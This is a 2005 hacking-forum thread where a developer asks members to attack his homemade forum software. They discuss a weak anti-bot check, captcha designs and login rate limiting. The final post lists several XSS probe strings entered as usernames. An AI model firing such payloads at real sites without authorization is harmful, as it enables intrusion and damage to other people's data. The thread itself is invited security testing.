Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 44
Guests Online: 38
Members Online: 6

Registered Members: 82839
Newest Member: fezphantom
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Page 2 of 2 < 1 2
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 01:43
Okay, I found a possable exploit. The "anti-bot" system you have on the signup forums don't work. A bot could easily bypass that because of the fact that the anti-bot codes end up in the source of the webpage in raw data. Let me explain this exploit.

Lets say someone creates a bot program to, for what ever reason, create a large amount of accounts. Let's say thousands in attempt to flood your server.

Example (theory):

This is pure theory. I have no tested it, it is based off my knowlage.

A bot program connects to port 80 and uses the GET method to return HTML for the register page. The bot then reads the returned data (the HTML source of that page) and because the generated anti-bot codes are posted on the page source in regular string format (raw, text, what ever you want to call it), it can simply get the anti-bot codes right off the returned data! It can then input the rest of the data (e-mail, user, password, etc.) and use the returned anti-bot codes to submit it.

In simple words, the anti-bot codes are visible in the source of the webpage... Which in theory (based off my knowlage), can be exploited.

Please anyone correct me if I have made any mistakes or have explained anything poorly.

Hope this helps!

P.S. I also sugguest you only have one anti-bot input. It would make it look a little more professional.

Edited by on 21-11-05 02:59
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 03:02
I have known about this "exploit" for a whileWink. I just said that to code in GD and advanced PHP image codes is very complexSmile. I will do it later in development, as the board is no-where near complete. If you cant find any other "expliots" then woot!
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 03:13
I dont know how many people have figured out the Admin COntrol Centers Location, but: http://www.programmer-scripts.com/NextGenBoard/ACC/
Hack itPfft. Try and do somethingSmile
Oh dear! The documentation is here:
http://www.programmer-scripts.com/Document1/

yeah. The D is capital. Forum screwing up..
SorrySmile

Edited by on 21-11-05 03:23
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 03:42
Ah yes, it is. Hmmm, just an idea. This may ligthen things up a bit, because I can not disagree with you when you say it is complex.

What if you a PHP script that displayed an image and set a variable for the anti-bot code... Then for each image loaded there would be a different code, and it would check the string vairable that was assigned when the image was loaded and compare it to the input field.

For example:

AD426CKE5.gif : code=5c532f84m4a
DVCV1CA52.gif : code=v367svr63adv

And so on...

So if it randomly set AD426CKE5.gif as the image for the anti-bot code, the picture would display the text "5c532f84m4a" and check to make sure the user has entered that text in the input field. Make sure the image file name and the actual text it displays (anti-bot code too) are different, or the bot could "leach" right off the file name it's self!

Just an idea.

Hope this helps as well!

Edited by on 21-11-05 03:45
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 03:49
The actual method I would be using is that The gd image has random amounts of characters. Then each character is inputed into the standard "Images/GD.gif", and then they are outputed. Then the possibility is assigned to a variable, and the variable is set into a database. Then the next page checks if the variable, the field, and if the user inputed is the sameSmile. Some bots are made to keep tryingPfft They could be easily coded to repeat until one possibility is listed.
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 03:55
Ah, that's true. You could make some kind of thing that limits the logins per minute. You know, that kind of thing. Wink Or you can make it so 3 wrong passwords and you have to wait three minute before logging in again. Anything like that should stop, if not cripple in some way, a bot.

Edited by on 21-11-05 04:01
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-11-05 04:04
Yah, I agree, and that isnt *too* heavy on coding for meSmile. But I want to keep this forum from blubbering to deathPfft. So That means I have to NOT make the database's huge. Then again, when this entire forum is "Done", It will become a BetaPfft. Then I have to add, delete, correct, modify, and all that fun stuff to the codeSmile
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 26-11-05 20:42
Major update. Change themes, ect! Then you can also make a thread. thread.php is in the works, and soon beta one will be up!

Almost here everyone! I need someone to actually try and hack it! I am updating everything, but it might be a while! Code is becoming commented, and I need you to hack it!
Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-11-05 01:33
working on it undercovernoob Wink all those login request are probably me nailing your login Pfft


Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-11-05 02:22
i managed to delete a few user accounts, by inputting a load of XSS attempts, profile.php?id= doesnt go over 11 any more, even though there are more.


Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-11-05 02:33
WilleH, I'm not sure what you mean.

Explain the XSS you used, as it wouldn't exactly be XSS if you're deleting SQL data.


Author

RE: Hacking a Homemade forum..


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-11-05 02:39
i tried loads of XSS variants including:

';alert('XSS')//\';alert('XSS')//";alert('XSS')//\";alert('XSS')//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=%26{}
<SCRIPT>alert("XSS")</SCRIPT>
\";alert('XSS');//
<META HTTP-EQUIV="refresh" CONTENT="0;url=nojavascript...alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=nojavascript...alert('XSS');>

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>


I know these arent SQL commands, but somehow one of these or some of the others i tried has screwed something up, because after i register with some of these as usernames im not given a user ID.

Go to: http://www.programmer-scripts.com/NextGenBoard/index.php then it shows the newest user, click on it, the profile?id= doesnt contain a value, as if ive not been given an ID. It says they have 18 users, yet there arent any ?id= over 11. i registered with an account called willeh and my id was over 11, and i could view my profile. But, after i entered some of the above combinations i was then unable too.

Just some thoughts,

Will.




Edited by on 27-11-05 02:44
Page 2 of 2 < 1 2